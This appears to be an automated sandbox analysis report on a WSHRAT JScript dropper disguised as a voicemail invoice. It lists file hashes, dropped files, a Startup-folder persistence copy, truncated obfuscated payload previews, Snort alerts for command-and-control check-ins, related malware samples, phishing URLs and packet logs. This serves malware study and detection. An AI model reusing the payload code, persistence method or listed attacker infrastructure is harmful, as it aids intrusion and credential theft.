	WinRAR.exe	Get hash	malicious	LimeRAT	Browse	104.20.3.235
	WD KILLER.exe	Get hash	malicious	PureLog Stealer	Browse	104.20.4.235
api.telegram.org	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse	149.154.167.220
	Pg5dhIO92K.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Shipping Reference_AWB 703280542_INVOICE_PDF.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	4289397_SEA SHIPMENT.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	PAYMENT COPY 02521.exe	Get hash	malicious	AgentTesla, PureLog Stealer, XWorm	Browse	149.154.167.220
	ERsg2wzaD4.exe	Get hash	malicious	DCRat, PureLog Stealer, zgRAT	Browse	149.154.167.220
	Yehir Hastanesi scan00100_PDF.exe	Get hash	malicious	AgentTesla, PureLog Stealer, zgRAT	Browse	149.154.167.220
	6tJtH22I7a.exe	Get hash	malicious	LummaC, Amadey, LummaC Stealer, Mars Stealer, PureLog Stealer, RedLine, Stealc	Browse	149.154.167.220
	file.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	file.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
TELEGRAMRU	https://scandal-lucah-melayu-viral.group-telegram.my.id/	Get hash	malicious	Unknown	Browse	149.154.167.99
	https://danakaget.uniclodw.web.id/	Get hash	malicious	Unknown	Browse	149.154.164.13
	https://teiegeram-hk.com/	Get hash	malicious	Unknown	Browse	149.154.167.99
	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse	149.154.167.220
	https://rentry.co/webitokt/raw	Get hash	malicious	Unknown	Browse	149.154.167.99
	Pg5dhIO92K.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	Shipping Reference_AWB 703280542_INVOICE_PDF.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	4289397_SEA SHIPMENT.exe	Get hash	malicious	AgentTesla	Browse	149.154.167.220
	3108_FreeDownloadFiles.zip	Get hash	malicious	PureLog Stealer, Vidar	Browse	149.154.167.99
	file.exe	Get hash	malicious	Vidar	Browse	149.154.167.99
CLOUDFLARENETUS	https://url6.mailanyone.net/scanner?m=1s9Rgg-0001cq-54&d=4%7Cmail%2F90%2F1716306000%2F1s9Rgg-0001cq-54%7Cin6i%7C57e1b682%7C26023477%7C10839452%7C664CC1BA6AE264A629C85064C11FFBD2&o=%2Fphth%3A%2Fktsilatastwuioaja%2F.cmbreyesllub&s=lh8IWNoEpJyhBSNhYRv-aFY2Urg	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	ELECTRONIC RECEIPT_Homeownersfg.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	ELECTRONIC RECEIPT_Jfs.html	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://phantmuiswalles.gitbook.io/	Get hash	malicious	Unknown	Browse	172.64.146.167
	https://metamasskluginn.blogspot.hk/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://neweventx.bgmis-mobile.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://pro.asyncooo.shop/https/web.telegram.org	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://bt-103301.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.19.178.52
	http://phantym-wallett.weebly.com/	Get hash	malicious	Unknown	Browse	162.159.136.66
	https://cloudflare-ipfs.com/ipfs/bafybeigamplrf7nvgvwzlbmlnszy7rlab4pwatrdj5q3idts3tvjtui4li/trustefnew.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
TUT-ASUS	gtKVgxrJ22.exe	Get hash	malicious	Gurcu Stealer, WhiteSnake Stealer	Browse	208.95.112.1
	rswift153826.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	t0LPAdxYUz.exe	Get hash	malicious	AsyncRAT, XWorm	Browse	208.95.112.1
	001761801735.INV.AWB.CO.SOF.20240521.100033.20240521.100205.194286.TIF.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	208.95.112.1
	schtasks.exe	Get hash	malicious	Blank Grabber	Browse	208.95.112.1
	oae7jKW2lr.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	9732092 skid fabrication- MTC-NRC-KMC.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	NEW PO (PO01-230227).exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
	Payment Transfer.exe	Get hash	malicious	AgentTesla, PureLog Stealer	Browse	208.95.112.1
	PO_21052024.exe	Get hash	malicious	AgentTesla	Browse	208.95.112.1
CLOUDFLARENETUS	https://url6.mailanyone.net/scanner?m=1s9Rgg-0001cq-54&d=4%7Cmail%2F90%2F1716306000%2F1s9Rgg-0001cq-54%7Cin6i%7C57e1b682%7C26023477%7C10839452%7C664CC1BA6AE264A629C85064C11FFBD2&o=%2Fphth%3A%2Fktsilatastwuioaja%2F.cmbreyesllub&s=lh8IWNoEpJyhBSNhYRv-aFY2Urg	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	ELECTRONIC RECEIPT_Homeownersfg.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	ELECTRONIC RECEIPT_Jfs.html	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://phantmuiswalles.gitbook.io/	Get hash	malicious	Unknown	Browse	172.64.146.167
	https://metamasskluginn.blogspot.hk/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://neweventx.bgmis-mobile.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://pro.asyncooo.shop/https/web.telegram.org	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://bt-103301.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.19.178.52
	http://phantym-wallett.weebly.com/	Get hash	malicious	Unknown	Browse	162.159.136.66
	https://cloudflare-ipfs.com/ipfs/bafybeigamplrf7nvgvwzlbmlnszy7rlab4pwatrdj5q3idts3tvjtui4li/trustefnew.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14
CLOUDFLARENETUS	https://url6.mailanyone.net/scanner?m=1s9Rgg-0001cq-54&d=4%7Cmail%2F90%2F1716306000%2F1s9Rgg-0001cq-54%7Cin6i%7C57e1b682%7C26023477%7C10839452%7C664CC1BA6AE264A629C85064C11FFBD2&o=%2Fphth%3A%2Fktsilatastwuioaja%2F.cmbreyesllub&s=lh8IWNoEpJyhBSNhYRv-aFY2Urg	Get hash	malicious	HtmlDropper, HTMLPhisher	Browse	104.17.2.184
	ELECTRONIC RECEIPT_Homeownersfg.html	Get hash	malicious	Unknown	Browse	104.17.25.14
	ELECTRONIC RECEIPT_Jfs.html	Get hash	malicious	Unknown	Browse	104.17.2.184
	https://phantmuiswalles.gitbook.io/	Get hash	malicious	Unknown	Browse	172.64.146.167
	https://metamasskluginn.blogspot.hk/	Get hash	malicious	Unknown	Browse	188.114.97.3
	https://neweventx.bgmis-mobile.com/	Get hash	malicious	HTMLPhisher	Browse	104.18.11.207
	http://pro.asyncooo.shop/https/web.telegram.org	Get hash	malicious	Unknown	Browse	188.114.96.3
	http://bt-103301.weeblysite.com/	Get hash	malicious	Unknown	Browse	104.19.178.52
	http://phantym-wallett.weebly.com/	Get hash	malicious	Unknown	Browse	162.159.136.66
	https://cloudflare-ipfs.com/ipfs/bafybeigamplrf7nvgvwzlbmlnszy7rlab4pwatrdj5q3idts3tvjtui4li/trustefnew.html	Get hash	malicious	HTMLPhisher	Browse	104.17.25.14

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
a0e9f5d64349fb13191bc781f81f42e1	41q1oGpbEVt.exe	Get hash	malicious	Unknown	Browse	104.20.3.235 149.154.167.220 104.20.4.235
	purchase_order_No20052024.cmd	Get hash	malicious	Remcos, DBatLoader	Browse	104.20.3.235 149.154.167.220 104.20.4.235
	7uQQ6rKGkN.exe	Get hash	malicious	RisePro Stealer	Browse	104.20.3.235 149.154.167.220 104.20.4.235
	2024-05-17_416001036.xlsx	Get hash	malicious	Unknown	Browse	104.20.3.235 149.154.167.220 104.20.4.235
	AFATS317052024.msi	Get hash	malicious	Unknown	Browse	104.20.3.235 149.154.167.220 104.20.4.235
	a virus.bat	Get hash	malicious	Unknown	Browse	104.20.3.235 149.154.167.220 104.20.4.235
	Lcjfuguruhxhrv.exe	Get hash	malicious	DBatLoader, FormBook	Browse	104.20.3.235 149.154.167.220 104.20.4.235
	file.exe	Get hash	malicious	RisePro Stealer	Browse	104.20.3.235 149.154.167.220 104.20.4.235
	PGA_Champ_2024_runde4.xlsm	Get hash	malicious	Unknown	Browse	104.20.3.235 149.154.167.220 104.20.4.235
	5ded80193e96c1d11f9694fa793bd7005864abd8668e3c997617b8e10e9ecb04_payload.exe	Get hash	malicious	SmokeLoader	Browse	104.20.3.235 149.154.167.220 104.20.4.235
37f463bf4616ecd445d4a1937da06e19	file.exe	Get hash	malicious	Vidar	Browse	172.66.44.176 104.21.25.148
	SecuriteInfo.com.Win64.DropperX-gen.22747.2720.exe	Get hash	malicious	Unknown	Browse	172.66.44.176 104.21.25.148
	SecuriteInfo.com.Win64.DropperX-gen.22747.2720.exe	Get hash	malicious	Unknown	Browse	172.66.44.176 104.21.25.148
	o365svc.db.exe	Get hash	malicious	Unknown	Browse	172.66.44.176 104.21.25.148
	file.exe	Get hash	malicious	Vidar	Browse	172.66.44.176 104.21.25.148
	Transferencia.exe	Get hash	malicious	FormBook, GuLoader	Browse	172.66.44.176 104.21.25.148
	Update_124.0.6367.158.js	Get hash	malicious	NetSupport RAT	Browse	172.66.44.176 104.21.25.148
	ansrnotificacaonova.msi	Get hash	malicious	Unknown	Browse	172.66.44.176 104.21.25.148
	001761801735.INV.AWB.CO.SOF.20240521.100033.20240521.100205.194286.TIF.hta	Get hash	malicious	AgentTesla, GuLoader	Browse	172.66.44.176 104.21.25.148
	file.exe	Get hash	malicious	Vidar	Browse	172.66.44.176 104.21.25.148

Process:	C:\Windows\System32\wscript.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	740
Entropy (8bit):	4.717736102726112
Encrypted:	false
SSDEEP:	12:f8IUu6mLevWEgZmV9r2o/atOuL4/zHoaNOZ6J697PzPhAjjFAL5QieyyGcLFcsFp:kNm1mV9r2opHoaNE/PgVkAaNLPg
MD5:	9BB7568D590DB29B3BAA6B84659A2A82
SHA1:	EAE654A1079904DA3985CF53E9863B1CF64D5BA1
SHA-256:	EF52F6405C9439E359A0A3E2D75EDC32F866CD41E8CEBE85AF3037373F3532DE
SHA-512:	C3A4AF37F8EAC9D671B022F7D686AABC4B9BA8A31900671C88EAF46C44D40AC125FDB2143F68629B9E41CD9881973057B3A5C7FF8DCB00A7D0B2FC49405C6B7F
Malicious:	false
Reputation:	low
Preview:	{. "ip": "8.46.123.175",. "isp": "Level 3",. "org": "CenturyLink Communications, LLC",. "hostname": "static-cpe-8-46-123-175.centurylink.com",. "latitude": 40.7128,. "longitude": -74.006,. "postal_code": "10123",. "city": "New York",. "country_code": "US",. "country_name": "United States",. "continent_code": "NA",. "continent_name": "North America",. "region": "New York",. "district": "",. "timezone_name": "America\/New_York",. "connection_type": "Corporate",. "asn_number": 3356,. "asn_org": "Level 3 Communications, Inc.",. "asn": "AS3356 - Level 3 Communications, Inc.",. "currency_code": "USD",. "currency_name": "US Dollar",. "success": true,. "premium": false.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\json[1].json

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	306
Entropy (8bit):	4.903705080375132
Encrypted:	false
SSDEEP:	6:YWybucxaNmd4rpHXIpIIIk7+Bkz4fQbtVVgW+1C/kB5CLj6H/RGzqd7XFY:YWybucxaNmd4rpHMIi+BgBVVf+teOfFw
MD5:	EA00C03ED0DDBDA916F72D2C7E8F91A1
SHA1:	13F99FA4C0133398EAD593439BD6BD8FE6D533CF
SHA-256:	AA4DB43A67777701ED970C8A3FE41E52950616DA47AA9B58AF05D22B32EDDF64
SHA-512:	778D0031B0B1B328F8884863F97AE165F3C0A65C63F4B84EE129C163A634A1A5245B639DA8DB10593DFA63E356477EA7BE8B6185D2E81741A882A98C27325FC6
Malicious:	false
Reputation:	low
Preview:	{"status":"success","country":"United States","countryCode":"US","region":"NY","regionName":"New York","city":"New York","zip":"10123","lat":40.7128,"lon":-74.006,"timezone":"America/New_York","isp":"Level 3","org":"CenturyLink Communications, LLC","as":"AS3356 Level 3 Parent, LLC","query":"8.46.123.175"}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\NZWJFGKO.json

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	740
Entropy (8bit):	4.717736102726112
Encrypted:	false
SSDEEP:	12:f8IUu6mLevWEgZmV9r2o/atOuL4/zHoaNOZ6J697PzPhAjjFAL5QieyyGcLFcsFp:kNm1mV9r2opHoaNE/PgVkAaNLPg
MD5:	9BB7568D590DB29B3BAA6B84659A2A82
SHA1:	EAE654A1079904DA3985CF53E9863B1CF64D5BA1
SHA-256:	EF52F6405C9439E359A0A3E2D75EDC32F866CD41E8CEBE85AF3037373F3532DE
SHA-512:	C3A4AF37F8EAC9D671B022F7D686AABC4B9BA8A31900671C88EAF46C44D40AC125FDB2143F68629B9E41CD9881973057B3A5C7FF8DCB00A7D0B2FC49405C6B7F
Malicious:	false
Reputation:	low
Preview:	{. "ip": "8.46.123.175",. "isp": "Level 3",. "org": "CenturyLink Communications, LLC",. "hostname": "static-cpe-8-46-123-175.centurylink.com",. "latitude": 40.7128,. "longitude": -74.006,. "postal_code": "10123",. "city": "New York",. "country_code": "US",. "country_name": "United States",. "continent_code": "NA",. "continent_name": "North America",. "region": "New York",. "district": "",. "timezone_name": "America\/New_York",. "connection_type": "Corporate",. "asn_number": 3356,. "asn_org": "Level 3 Communications, Inc.",. "asn": "AS3356 - Level 3 Communications, Inc.",. "currency_code": "USD",. "currency_name": "US Dollar",. "success": true,. "premium": false.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\R261FQTU.json

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	740
Entropy (8bit):	4.717736102726112
Encrypted:	false
SSDEEP:	12:f8IUu6mLevWEgZmV9r2o/atOuL4/zHoaNOZ6J697PzPhAjjFAL5QieyyGcLFcsFp:kNm1mV9r2opHoaNE/PgVkAaNLPg
MD5:	9BB7568D590DB29B3BAA6B84659A2A82
SHA1:	EAE654A1079904DA3985CF53E9863B1CF64D5BA1
SHA-256:	EF52F6405C9439E359A0A3E2D75EDC32F866CD41E8CEBE85AF3037373F3532DE
SHA-512:	C3A4AF37F8EAC9D671B022F7D686AABC4B9BA8A31900671C88EAF46C44D40AC125FDB2143F68629B9E41CD9881973057B3A5C7FF8DCB00A7D0B2FC49405C6B7F
Malicious:	false
Reputation:	low
Preview:	{. "ip": "8.46.123.175",. "isp": "Level 3",. "org": "CenturyLink Communications, LLC",. "hostname": "static-cpe-8-46-123-175.centurylink.com",. "latitude": 40.7128,. "longitude": -74.006,. "postal_code": "10123",. "city": "New York",. "country_code": "US",. "country_name": "United States",. "continent_code": "NA",. "continent_name": "North America",. "region": "New York",. "district": "",. "timezone_name": "America\/New_York",. "connection_type": "Corporate",. "asn_number": 3356,. "asn_org": "Level 3 Communications, Inc.",. "asn": "AS3356 - Level 3 Communications, Inc.",. "currency_code": "USD",. "currency_name": "US Dollar",. "success": true,. "premium": false.}

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\98575[1].js

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	946662
Entropy (8bit):	5.280349099672701
Encrypted:	false
SSDEEP:	24576:ZVMfSkyu8ZqzlbKwclKRkN7AlYjOb/zIUJtknRA6cgX//Qnvziang1e4z9YFzgzU:kSkyu0qJK/kkpAlYjOb/zBUnRbt3Qn2E
MD5:	A8DA2EA93BA67A601EE425E0FBF9AB39
SHA1:	3E9558A02D5CA808039A0C18FCA6EC9EC2F00E64
SHA-256:	BBD6785969BF56A00F91C586CDD67C5D24C11AFEBA2EFD93115325F419D8A54C
SHA-512:	1A25372435AFFE817C4CEA4A92ECB5BC991DFA53FCDA3033D24742CE69893DB5DA4479838ED0CF569FB47FCF4A7B304BFA0EE1D444BFE493BE5E68643051DB93
Malicious:	true
Yara Hits:	Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\98575[1].js, Author: Joe Security
Reputation:	low
Preview:	(function(_0x18965b,_0x113e7c){var _0x4c561b=_0x18965b();function _0x1ceeb9(_0x322dfc,_0x271d1b,_0x4227c2,_0x3c70bc){return _0x5d8f(_0x3c70bc-0x1db,_0x322dfc);}function _0x315081(_0x47bd4a,_0x527d9a,_0x1debdb,_0x2ad8ab){return _0x5d8f(_0x2ad8ab- -0x1ca,_0x1debdb);}while(!![]){try{var _0x19048c=parseInt(_0x315081(0x1142,0x1eb4,0xaed,0x1a28))/(0x204a0x1+-0x1e0x146+0x5eb)(-parseInt(_0x315081(0x1918,0x1034,0x1e99,0x20af))/(0x10x49d+0xb7-0x25+0x15d8))+-parseInt(_0x315081(0x182b,0x228f,0x10c1,0x280b))/(0x2053-0x1+-0x1d5+0x10x222b)(-parseInt(_0x1ceeb9(0x1d7a,0x1d48,0x1c95,0xc5c))/(-0xa23-0x1+-0x1073-0x1+-0xb30x26))+parseInt(_0x1ceeb9(0xc94,0x2246,0x211d,0x1eee))/(0x148f+-0x4860x3+-0x6f80x1)+parseInt(_0x1ceeb9(0x1bf5,0x18bc,0x2a40,0x237e))/(0x59a+-0x1328+-0x4f-0x2c)+-parseInt(_0x315081(0x1872,0x293e,0x178c,0x1d13))/(0xad-0x31+0xd0+0x2054)+-parseInt(_0x1ceeb9(0x64e,0x2f9e,0x2506,0x1a60))/(-0x120b+-0x1c3e+-0xa7-0x47)+parseInt(_0x1ceeb9(-0xd2b,-0x89a,0x413,0x8bc))/(0x15c5+0x2*0xf1

C:\Users\user\AppData\Local\Temp\98575.js

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	dropped
Size (bytes):	946662
Entropy (8bit):	5.280349099672701
Encrypted:	false
SSDEEP:	24576:ZVMfSkyu8ZqzlbKwclKRkN7AlYjOb/zIUJtknRA6cgX//Qnvziang1e4z9YFzgzU:kSkyu0qJK/kkpAlYjOb/zBUnRbt3Qn2E
MD5:	A8DA2EA93BA67A601EE425E0FBF9AB39
SHA1:	3E9558A02D5CA808039A0C18FCA6EC9EC2F00E64
SHA-256:	BBD6785969BF56A00F91C586CDD67C5D24C11AFEBA2EFD93115325F419D8A54C
SHA-512:	1A25372435AFFE817C4CEA4A92ECB5BC991DFA53FCDA3033D24742CE69893DB5DA4479838ED0CF569FB47FCF4A7B304BFA0EE1D444BFE493BE5E68643051DB93
Malicious:	true
Yara Hits:	Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: C:\Users\user\AppData\Local\Temp\98575.js, Author: Joe Security
Reputation:	low
Preview:	(function(_0x18965b,_0x113e7c){var _0x4c561b=_0x18965b();function _0x1ceeb9(_0x322dfc,_0x271d1b,_0x4227c2,_0x3c70bc){return _0x5d8f(_0x3c70bc-0x1db,_0x322dfc);}function _0x315081(_0x47bd4a,_0x527d9a,_0x1debdb,_0x2ad8ab){return _0x5d8f(_0x2ad8ab- -0x1ca,_0x1debdb);}while(!![]){try{var _0x19048c=parseInt(_0x315081(0x1142,0x1eb4,0xaed,0x1a28))/(0x204a0x1+-0x1e0x146+0x5eb)(-parseInt(_0x315081(0x1918,0x1034,0x1e99,0x20af))/(0x10x49d+0xb7-0x25+0x15d8))+-parseInt(_0x315081(0x182b,0x228f,0x10c1,0x280b))/(0x2053-0x1+-0x1d5+0x10x222b)(-parseInt(_0x1ceeb9(0x1d7a,0x1d48,0x1c95,0xc5c))/(-0xa23-0x1+-0x1073-0x1+-0xb30x26))+parseInt(_0x1ceeb9(0xc94,0x2246,0x211d,0x1eee))/(0x148f+-0x4860x3+-0x6f80x1)+parseInt(_0x1ceeb9(0x1bf5,0x18bc,0x2a40,0x237e))/(0x59a+-0x1328+-0x4f-0x2c)+-parseInt(_0x315081(0x1872,0x293e,0x178c,0x1d13))/(0xad-0x31+0xd0+0x2054)+-parseInt(_0x1ceeb9(0x64e,0x2f9e,0x2506,0x1a60))/(-0x120b+-0x1c3e+-0xa7-0x47)+parseInt(_0x1ceeb9(-0xd2b,-0x89a,0x413,0x8bc))/(0x15c5+0x2*0xf1

C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	ASCII text, with very long lines (65536), with no line terminators
Category:	modified
Size (bytes):	946662
Entropy (8bit):	5.280349099672701
Encrypted:	false
SSDEEP:	24576:ZVMfSkyu8ZqzlbKwclKRkN7AlYjOb/zIUJtknRA6cgX//Qnvziang1e4z9YFzgzU:kSkyu0qJK/kkpAlYjOb/zBUnRbt3Qn2E
MD5:	A8DA2EA93BA67A601EE425E0FBF9AB39
SHA1:	3E9558A02D5CA808039A0C18FCA6EC9EC2F00E64
SHA-256:	BBD6785969BF56A00F91C586CDD67C5D24C11AFEBA2EFD93115325F419D8A54C
SHA-512:	1A25372435AFFE817C4CEA4A92ECB5BC991DFA53FCDA3033D24742CE69893DB5DA4479838ED0CF569FB47FCF4A7B304BFA0EE1D444BFE493BE5E68643051DB93
Malicious:	true
Yara Hits:	Rule: JoeSecurity_WSHRAT, Description: Yara detected WSHRAT, Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\98575.js, Author: Joe Security
Reputation:	low
Preview:	(function(_0x18965b,_0x113e7c){var _0x4c561b=_0x18965b();function _0x1ceeb9(_0x322dfc,_0x271d1b,_0x4227c2,_0x3c70bc){return _0x5d8f(_0x3c70bc-0x1db,_0x322dfc);}function _0x315081(_0x47bd4a,_0x527d9a,_0x1debdb,_0x2ad8ab){return _0x5d8f(_0x2ad8ab- -0x1ca,_0x1debdb);}while(!![]){try{var _0x19048c=parseInt(_0x315081(0x1142,0x1eb4,0xaed,0x1a28))/(0x204a0x1+-0x1e0x146+0x5eb)(-parseInt(_0x315081(0x1918,0x1034,0x1e99,0x20af))/(0x10x49d+0xb7-0x25+0x15d8))+-parseInt(_0x315081(0x182b,0x228f,0x10c1,0x280b))/(0x2053-0x1+-0x1d5+0x10x222b)(-parseInt(_0x1ceeb9(0x1d7a,0x1d48,0x1c95,0xc5c))/(-0xa23-0x1+-0x1073-0x1+-0xb30x26))+parseInt(_0x1ceeb9(0xc94,0x2246,0x211d,0x1eee))/(0x148f+-0x4860x3+-0x6f80x1)+parseInt(_0x1ceeb9(0x1bf5,0x18bc,0x2a40,0x237e))/(0x59a+-0x1328+-0x4f-0x2c)+-parseInt(_0x315081(0x1872,0x293e,0x178c,0x1d13))/(0xad-0x31+0xd0+0x2054)+-parseInt(_0x1ceeb9(0x64e,0x2f9e,0x2506,0x1a60))/(-0x120b+-0x1c3e+-0xa7-0x47)+parseInt(_0x1ceeb9(-0xd2b,-0x89a,0x413,0x8bc))/(0x15c5+0x2*0xf1

Static File Info

General

File type:	ASCII text, with very long lines (28221), with no line terminators
Entropy (8bit):	5.2964513790299605
TrID:
File name:	New Voicemail Invoice 64746w .js
File size:	28'221 bytes
MD5:	9b74a685ed15a0ec174e423bc96219fe
SHA1:	cfdccb7ffcf08d8190993e085285df372c04aa56
SHA256:	0d1fe5df992467049c46c24da324e37a2322255ff16462338f61a6c0daebaaf6
SHA512:	769ffdb223c814cf42755cbe0e8857790bd9168d38847c56b0f71760b9078ce86bf25dd0e8418a0879d79fa3e8271df171f4c8afb9616d05e7b9b685e8354c1e
SSDEEP:	768:j/5w/VUwj68FSf5NFr2vpT6XnEULNGNt9RQ+qjIbgY46Kqw7rdCzvaPPJZC4/rq4:msEtIxdcaZ6T0Vi4CI
TLSH:	D7C274C16BE5E4C413879B32B727B0D1F81B8CD9A1C4488BF105BC60F5B9A16FEA85B5
File Content Preview:	(function(_0x5b701d,_0x2ea873){function _0x201ac8(_0x419fae,_0x47d5cb,_0x58585c,_0x191da1){return _0xbb87(_0x419fae- -0x39e,_0x58585c);}var _0x156d23=_0x5b701d();function _0x2e64ab(_0x5dcbcc,_0x13f15a,_0x190215,_0x2b1c22){return _0xbb87(_0x13f15a- -0x350,

File Icon


Icon Hash:	68d69b8bb6aa9a86

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/22/24-02:47:18.274642	TCP	2017516	ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	49745	8426	192.168.2.4	40.242.114.161
05/22/24-02:47:44.674706	TCP	2017516	ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	49751	8426	192.168.2.4	40.242.114.161
05/22/24-02:46:51.806517	TCP	2017516	ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	49744	8426	192.168.2.4	40.242.114.161
05/22/24-02:48:11.147838	TCP	2017516	ET TROJAN Worm.VBS Dunihi/Houdini/H-Worm/WSHRAT Checkin 1	49752	8426	192.168.2.4	40.242.114.161

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 22, 2024 02:46:38.061491013 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:38.061544895 CEST	443	49730	104.21.25.148	192.168.2.4
May 22, 2024 02:46:38.061641932 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:38.064416885 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:38.064436913 CEST	443	49730	104.21.25.148	192.168.2.4
May 22, 2024 02:46:38.565471888 CEST	443	49730	104.21.25.148	192.168.2.4
May 22, 2024 02:46:38.565582037 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:38.688064098 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:38.688174009 CEST	443	49730	104.21.25.148	192.168.2.4
May 22, 2024 02:46:38.689172983 CEST	443	49730	104.21.25.148	192.168.2.4
May 22, 2024 02:46:38.689270020 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:38.692852974 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:38.740118980 CEST	443	49730	104.21.25.148	192.168.2.4
May 22, 2024 02:46:39.260238886 CEST	443	49730	104.21.25.148	192.168.2.4
May 22, 2024 02:46:39.260351896 CEST	443	49730	104.21.25.148	192.168.2.4
May 22, 2024 02:46:39.260355949 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:39.260423899 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:39.263044119 CEST	49730	443	192.168.2.4	104.21.25.148
May 22, 2024 02:46:39.263083935 CEST	443	49730	104.21.25.148	192.168.2.4
May 22, 2024 02:46:39.686912060 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:39.686948061 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:39.687021017 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:39.687360048 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:39.687372923 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:40.371510983 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:40.371598959 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:40.375205994 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:40.375219107 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:40.375731945 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:40.376821995 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:40.376852036 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:40.376935959 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:40.667107105 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:40.671725035 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:40.671814919 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:40.671888113 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:40.671910048 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:40.671930075 CEST	49731	443	192.168.2.4	149.154.167.220
May 22, 2024 02:46:40.671936989 CEST	443	49731	149.154.167.220	192.168.2.4
May 22, 2024 02:46:40.782254934 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:40.782304049 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:40.782393932 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:40.782769918 CEST	49732	443	192.168.2.4	172.66.44.176
May 22, 2024 02:46:40.782788992 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.300493002 CEST	443	49732	172.66.44.176	192.168.2.4
May 22, 2024 02:46:41.300714970 CEST	49732	443	192.168.2.4	172.66.44.176
